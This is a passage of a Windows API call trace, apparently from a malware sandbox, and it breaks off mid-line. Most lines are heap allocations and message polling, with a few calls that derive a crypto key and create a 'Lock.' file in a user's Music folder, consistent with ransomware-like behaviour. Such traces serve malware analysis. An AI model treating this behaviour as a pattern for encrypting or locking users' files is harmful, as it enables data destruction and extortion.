Size=0x10) returned 0x34aab20 [0251.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0251.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0251.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0251.794] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0251.794] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.794] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0251.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0251.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0251.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0251.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0251.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0251.794] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0251.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0251.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0251.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0251.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0251.794] CryptDeriveKey (in: hProv=0xad2c70, Algid=0x6601, hBaseData=0xaa5860, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5760) returned 1 [0251.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0251.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0251.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0251.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0251.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0251.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0251.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0251.795] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0251.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0251.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0251.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0251.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0251.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0251.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0251.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0251.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0251.795] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.795] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0251.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0251.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0251.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0251.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0251.796] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0251.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0251.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0251.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0251.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0251.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0251.796] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0251.796] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0251.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0251.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0251.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0251.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0251.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0251.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0251.797] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0251.797] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0251.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0251.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0251.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0251.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0251.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0251.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0251.797] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0251.797] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0251.797] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0251.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0251.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0251.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0251.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0251.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0251.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0251.798] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0251.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0251.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0251.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0251.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0251.798] CryptDestroyHash (hHash=0xaa5860) returned 1 [0251.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0251.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0251.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0251.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0251.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0251.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0251.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0251.798] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0251.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0251.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0251.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0251.798] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0251.798] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.798] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.798] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0251.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0251.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0251.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0251.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0251.799] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ditreDSOdEug3Tyrxp1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ditredsodeug3tyrxp1"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.799] GetLastError () returned 0x5 [0251.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0251.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0251.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3551008 | out: hHeap=0x25c0000) returned 1 [0251.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0251.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0251.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0251.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0251.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0251.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0251.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0251.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0251.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0251.801] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0251.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0251.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0251.801] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0251.801] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0251.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0251.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0251.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0251.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0251.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0251.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0251.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0251.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0251.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0251.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0251.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0251.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0251.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0251.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0251.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0251.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0251.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0251.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0251.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x249c7b0 [0251.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0251.802] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music/" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music")) returned 0x11 [0251.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0251.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0251.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0251.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10000) returned 0x3551008 [0251.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0251.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0251.803] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music/Lock.ditreDSOdEug3Tyrxp1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\lock.ditredsodeug3tyrxp1"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0251.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0251.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0251.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0251.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0251.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0251.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0251.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0251.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0251.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0251.804] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0251.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0251.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0251.804] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0251.804] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0251.804] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0251.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0251.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0251.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0251.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0251.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0251.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0251.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0251.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0251.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0251.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0251.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0251.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0251.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0251.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0251.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0251.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0251.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0251.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0251.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0251.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0251.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0251.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0251.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0251.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0251.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0251.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0251.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0251.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0251.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0251.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0251.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0251.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0251.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0251.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0251.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0251.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0251.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0251.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0251.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0251.806] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0251.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0251.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0251.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0251.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0251.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0251.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1888 [0251.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0251.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0251.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0251.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0251.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0251.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0251.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 